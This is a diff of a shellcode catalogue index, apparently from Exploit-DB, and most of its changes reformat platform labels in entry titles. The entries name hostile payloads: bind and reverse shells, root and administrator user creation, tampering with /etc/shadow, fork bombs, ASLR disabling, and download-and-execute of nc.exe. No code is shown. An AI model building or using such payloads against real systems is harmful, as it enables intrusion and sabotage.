+13615,shellcodes/windows_x86/13615.c,"Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
 13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve(/bin/sh) Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86
 13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86
-13630,shellcodes/windows_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86
-13631,shellcodes/windows_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86
+13630,shellcodes/windows_x86/13630.c,"Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86
+13631,shellcodes/windows_x86/13631.c,"Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86
 13632,shellcodes/linux_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,linux_x86
-13635,shellcodes/windows_x86/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
-13636,shellcodes/windows_x86/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86
-13639,shellcodes/windows_x86/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86
-13642,shellcodes/windows_x86/13642.txt,"Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
-13645,shellcodes/windows/13645.c,"Windows - Egghunter JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows
-13647,shellcodes/windows_x86/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
-13648,shellcodes/windows_x86/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
-13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
+13635,shellcodes/windows_x86/13635.txt,"Windows/x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
+13636,shellcodes/windows_x86/13636.c,"Windows/x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86
+13639,shellcodes/windows_x86/13639.c,"Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86
+13642,shellcodes/windows_x86/13642.txt,"Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
+13645,shellcodes/windows/13645.c,"Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows
+13647,shellcodes/windows_x86/13647.txt,"Windows/x86 (XP SP3)  (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
+13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
+13649,shellcodes/windows/13649.txt,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
 13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
 13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
-13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86
+13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
 13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
 13673,shellcodes/linux_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
-13675,shellcodes/linux_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,linux_x86
+13675,shellcodes/linux_x86/13675.c,"Linux/x86 - execve(a->/bin/sh) + Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,linux_x86
 13676,shellcodes/linux_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,shellcode,linux_x86
 13677,shellcodes/linux_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,shellcode,linux_x86
 13679,shellcodes/generator/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,shellcode,generator
 13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
 13681,shellcodes/linux_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
-13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86
+13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86
 13688,shellcodes/linux_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
 13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
 13692,shellcodes/linux_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,linux_x86
 13697,shellcodes/linux_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,linux_x86
 13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86
-13699,shellcodes/windows_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86
+13699,shellcodes/windows_x86/13699.txt,"Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86
 13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86
-13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
 13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
 13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86
@@ -357,15 +357,15 @@ id,file,description,date,author,type,platform
 13712,shellcodes/linux_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,linux_x86
 13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86
 13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86
-13719,shellcodes/windows_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
+13719,shellcodes/windows_x86-64/13719.txt,"Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
 13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86
-13723,shellcodes/linux_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+13723,shellcodes/linux_x86/13723.c,"Linux/x86 - chmod 0777 /etc/shadow +  sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
-13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
-13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
-13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
-13729,shellcodes/windows_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
-13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
+13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+13728,shellcodes/linux_x86/13728.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
+13729,shellcodes/windows_x86-64/13729.txt,"Windows/x86-64 (7) - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
+13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
 13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
 13732,shellcodes/linux_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
 13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris
@@ -377,8 +377,8 @@ id,file,description,date,author,type,platform
 13908,shellcodes/linux_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
 13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
 13915,shellcodes/linux_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
-13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
-14014,shellcodes/windows_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,shellcode,windows_x86
+13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
+14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator
 14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
 14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
 14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm
@@ -389,46 +389,46 @@ id,file,description,date,author,type,platform
 14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
 14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
 14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
-14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
-14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
+14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
+14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
 14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
 14235,shellcodes/linux_x86/14235.c,"Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
 14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
 14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86
-14288,shellcodes/windows_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
+14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
 14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
 14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
-14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
-14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
+14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
+14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
 14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
-14873,shellcodes/windows_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,windows_x86
+14873,shellcodes/windows_x86/14873.asm,"Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-01,dijital1,shellcode,windows_x86
 14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
-15063,shellcodes/windows_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
-15116,shellcodes/arm/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm
-15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
-15202,shellcodes/windows_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
-15203,shellcodes/windows_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
+15063,shellcodes/windows_x86/15063.c,"Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
+15116,shellcodes/arm/15116.cpp,"Windows/ARM  (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm
+15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
+15202,shellcodes/windows_x86/15202.c,"Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
+15203,shellcodes/windows_x86/15203.c,"Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
 15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
-15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
+15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
 15618,shellcodes/osx/15618.c,"OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
 15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
-15879,shellcodes/windows_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
+15879,shellcodes/windows_x86/15879.txt,"Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
 16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
 16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
-16283,shellcodes/windows_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
+16283,shellcodes/windows_x86/16283.txt,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
 17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
 17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
 17224,shellcodes/osx/17224.s,"OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
 17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
 20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
-17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
+17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
 17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
 17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
-17545,shellcodes/windows_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
-17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
+17545,shellcodes/windows_x86/17545.txt,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
+17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
 17564,shellcodes/osx/17564.asm,"OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
 17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
 17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator
@@ -438,7 +438,7 @@ id,file,description,date,author,type,platform
 18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
 18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
 18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
-18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
+18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
 18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
 18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
@@ -446,54 +446,54 @@ id,file,description,date,author,type,platform
 21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
 21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm
 21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm
-40363,shellcodes/windows_x86/40363.c,"Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-22489,shellcodes/windows/22489.cpp,"Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
-40890,shellcodes/windows_x86-64/40890.c,"Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+40363,shellcodes/windows_x86/40363.c,"Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+22489,shellcodes/windows/22489.cpp,"Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
+40890,shellcodes/windows_x86-64/40890.c,"Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86
